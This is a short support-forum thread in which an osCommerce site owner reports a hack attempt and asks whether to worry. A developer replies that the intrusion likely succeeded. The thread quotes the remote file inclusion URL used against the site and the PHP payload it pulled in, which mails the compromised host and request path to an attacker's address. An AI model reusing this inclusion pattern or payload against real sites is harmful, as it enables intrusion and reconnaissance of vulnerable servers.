osCmax v2.5 User Manual
Results 1 to 2 of 2

Hack Attempt

This is a discussion on Hack Attempt within the osCommerce 2.2 Discussion forums, part of the osCommerce 2.2 Forums category; Just found this being used on my site: URL used: /catalog/index.php?cName=http://www.lussts.xpg.com.br/tester.txt Contents of URL: Code: <?php //================================= // // scan ...

      
  1. #1
    New Member
    Join Date
    Jan 2010
    Posts
    27
    Rep Power
    0


    Default Hack Attempt

    Just found this being used on my site:

    URL used:

    /catalog/index.php?cName=http://www.lussts.xpg.com.br/tester.txt

    Contents of URL:

    Code:
    <?php
    //=================================
    //
    //    scan inb0x hotmail v1.0
    //
    //  coded by FilhOte_Ccs and LOST
    //      nao rippem fdps :]
    //
    //
    //      Hacker Group 2007
    //=================================
    //
     ini_set("max_execution_time",-1);
     set_time_limit(0);
     $user = @get_current_user();
     $email = "$user";
     $assunto = "now-env";
     $email1 = "amd.1988@hotmail.com";
     $headers  = "From: <$email>rn";
    
    
     if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
     echo "Opa, enviado!";
     exit();
    }
     else{
     echo "Nao enviei..";
     exit();
     }
    ?>

    Should I be worried and how can I tell if the attempt is succesful?

    Thanks

  2. #2
    osCMax Development Team
    ridexbuilder's Avatar
    Join Date
    Jul 2008
    Location
    Haggisland
    Posts
    3,014
    Rep Power
    36


    Exclamation Re: Hack Attempt

    Quote Originally Posted by stewartm View Post
    Should I be worried and how can I tell if the attempt is succesful?
    Eh, yes, I should think so!
    Regardless of the payload, it was successful in that it got in there in the first place.
    Have a look at the 'Max wiki on tightening security - same principles apply.
    Hosting plans with installation, configuration, contributions, support and maintenance.

Similar Threads

  1. possible hack attempt?
    By silverping in forum osCmax v2 Customization/Mods
    Replies: 2
    Last Post: 10-20-2009, 12:47 AM
  2. Is this a hack?
    By pgmarshall in forum osCmax v2 Installation issues
    Replies: 6
    Last Post: 08-12-2009, 07:57 AM
  3. QT Pro STS hack
    By michael_s in forum New osCommerce Contributions
    Replies: 0
    Last Post: 04-13-2007, 08:00 AM
  4. 65.54.164.106, A Spider? possible hack attempt?
    By fridgemags in forum osCmax v1.7 Discussion
    Replies: 2
    Last Post: 06-18-2004, 06:39 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •